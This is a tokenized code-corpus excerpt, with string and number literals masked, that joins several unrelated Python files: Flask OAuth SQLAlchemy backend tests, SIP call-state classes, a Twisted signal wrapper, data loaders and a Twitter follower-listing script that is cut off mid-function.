"<STR_LIT>" <EOL> assert oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> assert oauth . user_id == user . id <EOL> def test_sqla_flask_login_preload_logged_in_user ( app , db , blueprint , request ) : <EOL> responses . add ( <EOL> responses . GET , <EOL> "<STR_LIT>" , <EOL> ) <EOL> login_manager = LoginManager ( app ) <EOL> class User ( db . Model , UserMixin ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> user_id = db . Column ( db . Integer , db . ForeignKey ( User . id ) ) <EOL> user = db . relationship ( User ) <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session , user = current_user ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> alice = User ( name = "<STR_LIT>" ) <EOL> alice_token = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> alice_oauth = OAuth ( user = alice , token = alice_token , provider = "<STR_LIT>" ) <EOL> bob = User ( name = "<STR_LIT>" ) <EOL> bob_token = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> bob_oauth = OAuth ( user = bob , token = bob_token , provider = "<STR_LIT>" ) <EOL> chuck = User ( name = "<STR_LIT>" ) <EOL> db . session . add_all ( [ alice , alice_oauth , bob , bob_oauth , chuck ] ) <EOL> db . session . commit ( ) <EOL> @ login_manager . user_loader <EOL> def load_user ( userid ) : <EOL> return User . query . get ( userid ) <EOL> @ app . route ( "<STR_LIT:/>" ) <EOL> def index ( ) : <EOL> return "<STR_LIT:success>" <EOL> with app . test_request_context ( "<STR_LIT:/>" ) : <EOL> login_user ( alice ) <EOL> blueprint . session . get ( "<STR_LIT>" ) <EOL> assert blueprint . session . token == alice_token <EOL> with app . test_request_context ( "<STR_LIT:/>" ) : <EOL> login_user ( bob ) <EOL> blueprint . session . get ( "<STR_LIT>" ) <EOL> assert blueprint . session . token == bob_token <EOL> with app . test_request_context ( "<STR_LIT:/>" ) : <EOL> login_user ( chuck ) <EOL> blueprint . session . get ( "<STR_LIT>" ) <EOL> assert blueprint . session . token == None <EOL> with app . test_request_context ( "<STR_LIT:/>" ) : <EOL> logout_user ( ) <EOL> blueprint . session . get ( "<STR_LIT>" ) <EOL> assert blueprint . session . token == None <EOL> def test_sqla_delete_token ( app , db , blueprint , request ) : <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> pass <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> existing = OAuth ( <EOL> provider = "<STR_LIT>" , <EOL> token = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } , <EOL> ) <EOL> db . session . add ( existing ) <EOL> db . session . commit ( ) <EOL> assert len ( OAuth . query . all ( ) ) == <NUM_LIT:1> <EOL> assert blueprint . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> del blueprint . token <EOL> assert blueprint . token == None <EOL> assert len ( OAuth . query . all ( ) ) == <NUM_LIT:0> <EOL> def test_sqla_overwrite_token ( app , db , blueprint , request ) : <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> pass <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> existing = OAuth ( <EOL> provider = "<STR_LIT>" , <EOL> token = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } , <EOL> ) <EOL> db . session . add ( existing ) <EOL> db . session . commit ( ) <EOL> assert len ( OAuth . query . all ( ) ) == <NUM_LIT:1> <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:2> <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:1> <EOL> oauth = authorizations [ <NUM_LIT:0> ] <EOL> assert oauth . provider == "<STR_LIT>" <EOL> assert isinstance ( oauth . token , dict ) <EOL> assert oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> def test_sqla_cache ( app , db , blueprint , request ) : <EOL> cache = Cache ( app ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> pass <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session , cache = cache ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:2> <EOL> expected_token = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:1> <EOL> oauth = authorizations [ <NUM_LIT:0> ] <EOL> assert oauth . provider == "<STR_LIT>" <EOL> assert isinstance ( oauth . token , dict ) <EOL> assert oauth . token == expected_token <EOL> assert cache . get ( "<STR_LIT>" ) is None <EOL> with record_queries ( db . engine ) as queries : <EOL> assert blueprint . token == expected_token <EOL> assert len ( queries ) == <NUM_LIT:1> <EOL> assert cache . get ( "<STR_LIT>" ) == expected_token <EOL> with record_queries ( db . engine ) as queries : <EOL> assert blueprint . token == expected_token <EOL> assert len ( queries ) == <NUM_LIT:0> </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> packages = find_packages ( ) , <EOL> install_requires = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } , <EOL> test_suite = '<STR_LIT>' , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> license = "<STR_LIT>" , <EOL> keywords = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> ) </s>
<s> from signal import signal , SIG_IGN , SIG_DFL <EOL> from twisted . internet import reactor <EOL> from datetime import datetime <EOL> from traceback import print_exc <EOL> from sys import stdout <EOL> class Signal ( object ) : <EOL> callback = None <EOL> parameters = None <EOL> previous_handler = None <EOL> def __init__ ( self , signum , callback , * parameters ) : <EOL> self . signum = signum <EOL> self . callback = callback <EOL> self . parameters = parameters <EOL> self . previous_handler = signal ( signum , self . signal_handler ) <EOL> def signal_handler ( self , signum , * frame ) : <EOL> reactor . callFromThread ( self . dispatch ) <EOL> if self . previous_handler not in ( SIG_IGN , SIG_DFL ) : <EOL> try : <EOL> self . previous_handler ( signum , * frame ) <EOL> except : <EOL> print datetime . now ( ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print_exc ( file = stdout ) <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> stdout . flush ( ) <EOL> def dispatch ( self ) : <EOL> try : <EOL> self . callback ( * self . parameters ) <EOL> except : <EOL> print datetime . now ( ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print_exc ( file = stdout ) <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> stdout . flush ( ) <EOL> def cancel ( self ) : <EOL> signal ( self . signum , self . previous_handler ) <EOL> self . callback = None <EOL> self . parameters = None <EOL> self . previous_handler = None <EOL> def log_signal ( signum , sip_logger , signal_cb , cb_params ) : <EOL> sip_logger . write ( '<STR_LIT>' % ( signum , str ( signal_cb ) ) ) <EOL> return signal_cb ( * cb_params ) <EOL> def LogSignal ( sip_logger , signum , signal_cb , * cb_params ) : <EOL> sip_logger . write ( '<STR_LIT>' % ( signum , str ( signal_cb ) ) ) <EOL> return Signal ( signum , log_signal , signum , sip_logger , signal_cb , cb_params ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from signal import SIGHUP , SIGURG , SIGTERM <EOL> from os import kill , getpid <EOL> def test ( arguments ) : <EOL> arguments [ '<STR_LIT:test>' ] = not arguments [ '<STR_LIT:test>' ] <EOL> reactor . crash ( ) <EOL> arguments = { '<STR_LIT:test>' : False } <EOL> s = Signal ( SIGURG , test , arguments ) <EOL> kill ( getpid ( ) , SIGURG ) <EOL> reactor . run ( ) <EOL> assert ( arguments [ '<STR_LIT:test>' ] ) <EOL> s . cancel ( ) <EOL> Signal ( SIGHUP , test , arguments ) <EOL> kill ( getpid ( ) , SIGURG ) <EOL> kill ( getpid ( ) , SIGHUP ) <EOL> reactor . run ( ) <EOL> assert ( not arguments [ '<STR_LIT:test>' ] ) <EOL> from SipLogger import SipLogger <EOL> sip_logger = SipLogger ( '<STR_LIT>' ) <EOL> LogSignal ( sip_logger , SIGTERM , test , arguments ) <EOL> kill ( getpid ( ) , SIGTERM ) <EOL> reactor . run ( ) <EOL> assert ( arguments [ '<STR_LIT:test>' ] ) </s>
<s> from SipFrom import SipFrom <EOL> class SipRecordRoute ( SipFrom ) : <EOL> hf_names = ( '<STR_LIT>' , ) <EOL> relaxedparser = False <EOL> def getCanName ( self , name , compact = False ) : <EOL> if name == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> def getAddr ( self ) : <EOL> return self . address . url . getAddr ( ) </s>
<s> from SipAddress import SipAddress <EOL> from SipRoute import SipRoute <EOL> from UaStateGeneric import UaStateGeneric <EOL> from CCEvents import CCEventRing , CCEventConnect , CCEventFail , CCEventRedirect , CCEventDisconnect , CCEventPreConnect <EOL> class UacStateRinging ( UaStateGeneric ) : <EOL> sname = '<STR_LIT>' <EOL> triedauth = False <EOL> def recvResponse ( self , resp , tr ) : <EOL> body = resp . getBody ( ) <EOL> code , reason = resp . getSCode ( ) <EOL> scode = ( code , reason , body ) <EOL> if code < <NUM_LIT:200> : <EOL> if self . ua . p1xx_ts == None : <EOL> self . ua . p1xx_ts = resp . rtime <EOL> self . ua . last_scode = code <EOL> event = CCEventRing ( scode , rtime = resp . rtime , origin = self . ua . origin ) <EOL> for ring_cb in self . ua . ring_cbs : <EOL> ring_cb ( self . ua , resp . rtime , self . ua . origin , code ) <EOL> if body != None : <EOL> if self . ua . on_remote_sdp_change != None : <EOL> self . ua . on_remote_sdp_change ( body , lambda x : self . ua . delayed_remote_sdp_update ( event , x ) ) <EOL> return None <EOL> else : <EOL> self . ua . rSDP = body . getCopy ( ) <EOL> else : <EOL> self . ua . rSDP = None <EOL> self . ua . equeue . append ( event ) <EOL> return None <EOL> if self . ua . expire_timer != None : <EOL> self . ua . expire_timer . cancel ( ) <EOL> self . ua . expire_timer = None <EOL> if code >= <NUM_LIT:200> and code < <NUM_LIT> : <EOL> if resp . countHFs ( '<STR_LIT>' ) > <NUM_LIT:0> : <EOL> self . ua . rTarget = resp . getHFBody ( '<STR_LIT>' ) . getUrl ( ) . getCopy ( ) <EOL> self . ua . routes = [ x . getCopy ( ) for x in resp . getHFBodys ( '<STR_LIT>' ) ] <EOL> self . ua . routes . reverse ( ) <EOL> if len ( self . ua . routes ) > <NUM_LIT:0> : <EOL> if not self . ua . routes [ <NUM_LIT:0> ] . getUrl ( ) . lr : <EOL> self . ua . routes . append ( SipRoute ( address = SipAddress ( url = self . ua . rTarget ) ) ) <EOL> self . ua . rTarget = self . ua . routes . pop ( <NUM_LIT:0> ) . getUrl ( ) <EOL> self . ua . rAddr = self . ua . rTarget . getAddr ( ) <EOL> elif self . ua . outbound_proxy != None : <EOL> self . ua . routes . append ( SipRoute ( address = SipAddress ( url = self . ua . rTarget ) ) ) <EOL> self . ua . rTarget = self . ua . routes [ <NUM_LIT:0> ] . getUrl ( ) . getCopy ( ) <EOL> self . ua . rTarget . lr = False <EOL> self . ua . rTarget . other = tuple ( ) <EOL> self . ua . rTarget . headers = tuple ( ) <EOL> else : <EOL> self . ua . rAddr = self . ua . routes [ <NUM_LIT:0> ] . getAddr ( ) <EOL> else : <EOL> self . ua . rAddr = self . ua . rTarget . getAddr ( ) <EOL> tag = resp . getHFBody ( '<STR_LIT:to>' ) . getTag ( ) <EOL> if tag == None : <EOL> print '<STR_LIT>' <EOL> scode = ( <NUM_LIT> , '<STR_LIT>' ) <EOL> self . ua . equeue . append ( CCEventFail ( scode , rtime = resp . rtime , origin = self . ua . origin ) ) <EOL> if resp . countHFs ( '<STR_LIT>' ) > <NUM_LIT:0> : <EOL> self . ua . rTarget = resp . getHFBody ( '<STR_LIT>' ) . getUrl ( ) . getCopy ( ) <EOL> self . ua . routes = [ x . getCopy ( ) for x in resp . getHFBodys ( '<STR_LIT>' ) ] <EOL> self . ua . routes . reverse ( ) <EOL> if len ( self . ua . routes ) > <NUM_LIT:0> : <EOL> if not self . ua . routes [ <NUM_LIT:0> ] . getUrl ( ) . lr : <EOL> self . ua . routes . append ( SipRoute ( address = SipAddress ( url = self . ua . rTarget ) ) ) <EOL> self . ua . rTarget = self . ua . routes . pop ( <NUM_LIT:0> ) . getUrl ( ) <EOL> self . ua . rAddr = self . ua . rTarget . getAddr ( ) <EOL> elif self . ua . outbound_proxy != None : <EOL> self . ua . routes . append ( SipRoute ( address = SipAddress ( url = self . ua . rTarget ) ) ) <EOL> self . ua . rTarget = self . ua . routes [ <NUM_LIT:0> ] . getUrl ( ) . getCopy ( ) <EOL> self . ua . rTarget . lr = False <EOL> self . ua . rTarget . other = tuple ( ) <EOL> self . ua . rTarget . headers = tuple ( ) <EOL> else : <EOL> self . ua . rAddr = self . ua . routes [ <NUM_LIT:0> ] . getAddr ( ) <EOL> else : <EOL> self . ua . rAddr = self . ua . rTarget . getAddr ( ) <EOL> req = self . ua . genRequest ( '<STR_LIT>' ) <EOL> self . ua . lCSeq += <NUM_LIT:1> <EOL> self . ua . global_config [ '<STR_LIT>' ] . newTransaction ( req , laddress = self . ua . source_address , compact = self . ua . compact_sip ) <EOL> return ( UaStateFailed , self . ua . fail_cbs , resp . rtime , self . ua . origin , scode [ <NUM_LIT:0> ] ) <EOL> self . ua . rUri . setTag ( tag ) <EOL> if not self . ua . late_media or body == None : <EOL> self . ua . late_media = False <EOL> event = CCEventConnect ( scode , rtime = resp . rtime , origin = self . ua . origin ) <EOL> self . ua . startCreditTimer ( resp . rtime ) <EOL> self . ua . connect_ts = resp . rtime <EOL> rval = ( UaStateConnected , self . ua . conn_cbs , resp . rtime , self . ua . origin ) <EOL> else : <EOL> event = CCEventPreConnect ( scode , rtime = resp . rtime , origin = self . ua . origin ) <EOL> tr . uack = True <EOL> self . ua . pending_tr = tr <EOL> rval = ( UaStateConnected , ) <EOL> if body != None : <EOL> if self . ua . on_remote_sdp_change != None : <EOL> self . ua . on_remote_sdp_change ( body , lambda x : self . ua . delayed_remote_sdp_update ( event , x ) ) <EOL> return rval <EOL> else : <EOL> self . ua . rSDP = body . getCopy ( ) <EOL> else : <EOL> self . ua . rSDP = None <EOL> self . ua . equeue . append ( event ) <EOL> return rval <EOL> if code in ( <NUM_LIT> , <NUM_LIT> ) and resp . countHFs ( '<STR_LIT>' ) > <NUM_LIT:0> : <EOL> scode = ( code , reason , body , resp . getHFBody ( '<STR_LIT>' ) . getUrl ( ) . getCopy ( ) ) <EOL> self . ua . equeue . append ( CCEventRedirect ( scode , rtime = resp . rtime , origin = self . ua . origin ) ) <EOL> else : <EOL> event = CCEventFail ( scode , rtime = resp . rtime , origin = self . ua . origin ) <EOL> try : <EOL> event . reason = resp . getHFBody ( '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> self . ua . equeue . append ( event ) <EOL> self . ua . disconnect_ts = resp . rtime <EOL> return ( UaStateFailed , self . ua . fail_cbs , resp . rtime , self . ua . origin , code ) <EOL> def recvEvent ( self , event ) : <EOL> if isinstance ( event , CCEventFail ) or isinstance ( event , CCEventRedirect ) or isinstance ( event , CCEventDisconnect ) : <EOL> self . ua . global_config [ '<STR_LIT>' ] . cancelTransaction ( self . ua . tr , reason = event . reason ) <EOL> if self . ua . expire_timer != None : <EOL> self . ua . expire_timer . cancel ( ) <EOL> self . ua . expire_timer = None <EOL> self . ua . disconnect_ts = event . rtime <EOL> return ( UacStateCancelling , self . ua . disc_cbs , event . rtime , event . origin , self . ua . last_scode ) <EOL> return None <EOL> if not globals ( ) . has_key ( '<STR_LIT>' ) : <EOL> from UaStateFailed import UaStateFailed <EOL> if not globals ( ) . has_key ( '<STR_LIT>' ) : <EOL> from UaStateConnected import UaStateConnected <EOL> if not globals ( ) . has_key ( '<STR_LIT>' ) : <EOL> from UacStateCancelling import UacStateCancelling </s>
<s> import csv <EOL> import os <EOL> import json <EOL> import re <EOL> re_nonwords = re . compile ( r'<STR_LIT>' ) <EOL> def get_zipcodes ( ) : <EOL> dirname = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> zips = { } <EOL> states = set ( ) <EOL> with file ( os . path . join ( dirname , '<STR_LIT>' ) , '<STR_LIT:r>' ) as f : <EOL> r = csv . reader ( f ) <EOL> for row in r : <EOL> data = { '<STR_LIT>' : row [ <NUM_LIT:5> ] , <EOL> '<STR_LIT>' : row [ <NUM_LIT:4> ] , <EOL> '<STR_LIT:state>' : row [ <NUM_LIT:2> ] . lower ( ) , <EOL> '<STR_LIT>' : row [ <NUM_LIT:3> ] . lower ( ) } <EOL> zips [ row [ <NUM_LIT:1> ] . lower ( ) ] = data <EOL> states . add ( row [ <NUM_LIT:2> ] . lower ( ) ) <EOL> return zips <EOL> def get_states ( ) : <EOL> dirname = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> data = json . load ( file ( os . path . join ( dirname , '<STR_LIT>' ) , '<STR_LIT:r>' ) ) <EOL> ret = { } <EOL> for row in data : <EOL> name = row [ <NUM_LIT:0> ] <EOL> for v in row : <EOL> if v and not v . startswith ( "<STR_LIT:(>" ) : <EOL> v = re_nonwords . sub ( '<STR_LIT>' , v ) <EOL> if v : <EOL> ret [ v ] = name <EOL> return ret <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print get_states ( ) . items ( ) [ : <NUM_LIT:2> ] <EOL> print get_zipcodes ( ) . items ( ) [ : <NUM_LIT:2> ] </s>
<s> import numpy as np <EOL> from replay_memory import ReplayMemoryHDF5 <EOL> settings = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : ( <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : <NUM_LIT:1000> , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:20> ) , <EOL> '<STR_LIT>' : <NUM_LIT:32> <EOL> } <EOL> mem = ReplayMemoryHDF5 ( settings ) <EOL> o_dims = settings [ '<STR_LIT>' ] <EOL> for i in xrange ( <NUM_LIT:1000> ) : <EOL> obs = np . random . random ( o_dims ) + i <EOL> a = np . random . randint ( <NUM_LIT:10> ) + i <EOL> r = np . random . rand ( ) + i <EOL> obsp = np . random . random ( o_dims ) + i <EOL> term = bool ( np . random . binomial ( <NUM_LIT:1> , <NUM_LIT:0.1> ) ) <EOL> mem . store_tuple ( obs , a , r , obsp , term ) <EOL> o , a , r , op , terms = mem . minibatch ( ) </s>
<s> from . client import * <EOL> from . server import * </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import os , sys , time , calendar <EOL> from getopt import gnu_getopt as getopt , GetoptError <EOL> try : <EOL> import urllib . request as urllib2 <EOL> import http . client as httplib <EOL> except ImportError : <EOL> import urllib2 <EOL> import httplib <EOL> CONSUMER_KEY = '<STR_LIT>' <EOL> CONSUMER_SECRET = '<STR_LIT>' <EOL> from . api import Twitter , TwitterError <EOL> from . oauth import OAuth , read_token_file <EOL> from . oauth_dance import oauth_dance <EOL> from . auth import NoAuth <EOL> from . util import Fail , err <EOL> def parse_args ( args , options ) : <EOL> """<STR_LIT>""" <EOL> long_opts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> short_opts = "<STR_LIT>" <EOL> opts , extra_args = getopt ( args , short_opts , long_opts ) <EOL> for opt , arg in opts : <EOL> if opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> print ( __doc__ ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> elif opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = True <EOL> elif opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = True <EOL> elif opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = False <EOL> elif opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = True <EOL> elif opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = True <EOL> options [ '<STR_LIT>' ] = extra_args <EOL> def lookup_portion ( twitter , user_ids ) : <EOL> """<STR_LIT>""" <EOL> users = { } <EOL> kwargs = dict ( user_id = "<STR_LIT:U+002C>" . join ( map ( str , user_ids ) ) , skip_status = <NUM_LIT:1> ) <EOL> for u in twitter . users . lookup ( ** kwargs ) : <EOL> users [ int ( u [ '<STR_LIT:id>' ] ) ] = u [ '<STR_LIT>' ] <EOL> return users <EOL> def lookup ( twitter , user_ids ) : <EOL> """<STR_LIT>""" <EOL> users = { } <EOL> api_limit = <NUM_LIT:100> <EOL> for i in range ( <NUM_LIT:0> , len ( user_ids ) , api_limit ) : <EOL> fail = Fail ( ) <EOL> while True : <EOL> try : <EOL> portion = lookup_portion ( twitter , user_ids [ i : ] [ : api_limit ] ) <EOL> except TwitterError as e : <EOL> if e . e . code == <NUM_LIT> : <EOL> err ( "<STR_LIT>" % e . e . code ) <EOL> rls = twitter . application . rate_limit_status ( ) <EOL> reset = rls . rate_limit_reset <EOL> reset = time . asctime ( time . localtime ( reset ) ) <EOL> delay = int ( rls . rate_limit_reset <EOL> - time . time ( ) ) + <NUM_LIT:5> <EOL> err ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( rls . rate_limit_limit , reset , delay ) ) <EOL> fail . wait ( delay ) <EOL> continue <EOL> elif e . e . code == <NUM_LIT> : <EOL> err ( "<STR_LIT>" <EOL> % e . e . code ) <EOL> else : <EOL> err ( "<STR_LIT>" % str ( e ) [ : <NUM_LIT> ] ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except urllib2 . URLError as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except httplib . error as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except KeyError as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> else : <EOL> users . update ( portion ) <EOL> err ( "<STR_LIT>" <EOL> % ( len ( users ) , len ( user_ids ) ) ) <EOL> break <EOL> return users <EOL> def follow_portion ( twitter , screen_name , cursor = - <NUM_LIT:1> , followers = True ) : <EOL> """<STR_LIT>""" <EOL> kwargs = dict ( screen_name = screen_name , cursor = cursor ) <EOL> if followers : <EOL> t = twitter . followers . ids ( ** kwargs ) <EOL> else : <EOL> t = twitter . friends . ids ( ** kwargs ) <EOL> return t [ '<STR_LIT>' ] , t [ '<STR_LIT>' ] <EOL> def follow ( twitter , screen_name , followers = True ) : <EOL> """<STR_LIT>""" <EOL> user_ids = [ ] <EOL> cursor = - <NUM_LIT:1> <EOL> fail = Fail ( ) <EOL> while True : <EOL> try : <EOL> portion , cursor = follow_portion ( twitter , screen_name , cursor , <EOL> followers ) <EOL> except TwitterError as e : <EOL> if e . e . code == <NUM_LIT> : <EOL> reason = ( "<STR_LIT>" <EOL> % ( "<STR_LIT>" if followers else "<STR_LIT>" ) ) <EOL> err ( "<STR_LIT>" % ( e . e . code , reason ) ) <EOL> break <EOL> elif e . e . code == <NUM_LIT> : <EOL> err ( "<STR_LIT>" % e . e . code ) <EOL> rls = twitter . application . rate_limit_status ( ) <EOL> reset = rls . rate_limit_reset <EOL> reset = time . asctime ( time . localtime ( reset ) ) <EOL> delay = int ( rls . rate_limit_reset <EOL> - time . time ( ) ) + <NUM_LIT:5> <EOL> err ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( rls . rate_limit_limit , <EOL> reset , delay ) ) <EOL> fail . wait ( delay ) <EOL> continue <EOL> elif e . e . code == <NUM_LIT> : <EOL> err ( "<STR_LIT>" <EOL> % e . e . code ) <EOL> else : <EOL> err ( "<STR_LIT>" % str ( e ) [ : <NUM_LIT> ] ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except urllib2 . URLError as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except httplib . error as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except KeyError as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> else : <EOL> new = - len ( user_ids ) <EOL> user_ids = list ( set ( user_ids + portion ) ) <EOL> new += len ( user_ids ) <EOL> what = "<STR_LIT>" % ( "<STR_LIT>" if followers else "<STR_LIT>" ) <EOL> err ( "<STR_LIT>" % ( screen_name , what , new ) ) <EOL> if cursor == <NUM_LIT:0> : <EOL> break <EOL> fail = Fail ( ) <EOL> return user_ids <EOL> def rate_limit_status ( twitter ) : <EOL> """<STR_LIT>""" <EOL> rls = twitter . application . rate_limit_status ( ) <EOL> print ( "<STR_LIT>" <EOL> % ( rls . rate_limit_remaining , rls . rate_limit_limit ) ) <EOL> print ( "<STR_LIT>" <EOL> % ( int ( rls . rate_limit_reset - time . time ( ) ) , <EOL> time . asctime ( time . localtime ( rls . rate_limit_reset ) ) ) ) <EOL> def main ( args = sys . argv [ <NUM_LIT:1> : ] ) : <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> try : <EOL> parse_args ( args , options ) <EOL> except GetoptError as e : <EOL> err ( "<STR_LIT>" % e ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> if not options [ '<STR_LIT>' ] and not options [ '<STR_LIT>' ] : <EOL> print ( __doc__ ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> if options [ '<STR_LIT>' ] : <EOL> oauth_filename = ( os . getenv ( "<STR_LIT>" , "<STR_LIT>" ) + os . sep <EOL> + "<STR_LIT>" ) <EOL> if not os . path . exists ( oauth_filename ) : <EOL> oauth_dance ( "<STR_LIT>" , CONSUMER_KEY , CONSUMER_SECRET , <EOL> oauth_filename ) <EOL> oauth_token , oauth_token_secret = read_token_file ( oauth_filename ) <EOL> auth = OAuth ( oauth_token , oauth_token_secret , CONSUMER_KEY , <EOL> CONSUMER_SECRET ) <EOL> else : <EOL> auth = NoAuth ( ) <EOL> twitter = Twitter ( auth = auth , api_version = '<STR_LIT>' , domain = '<STR_LIT>' ) <EOL> if options [ '<STR_LIT>' ] : <EOL> rate_limit_status ( twitter ) <EOL> return <EOL> for user in options [ '<STR_LIT>' ] : <EOL> user_ids , users = [ ] , { } <EOL> try : <EOL> user_ids = follow ( twitter , user , options [ '<STR_LIT>' ] ) <EOL> users = lookup ( twitter , user_ids ) <EOL> except KeyboardInterrupt as e : <EOL> err ( ) <EOL> err ( "<STR_LIT>" ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> for uid in user_ids : <EOL> if options [ '<STR_LIT>' ] : <EOL> try : <EOL> print ( str ( uid ) + "<STR_LIT:\t>" + users [ uid ] . encode ( "<STR_LIT:utf-8>" ) ) <EOL> except KeyError : <EOL> 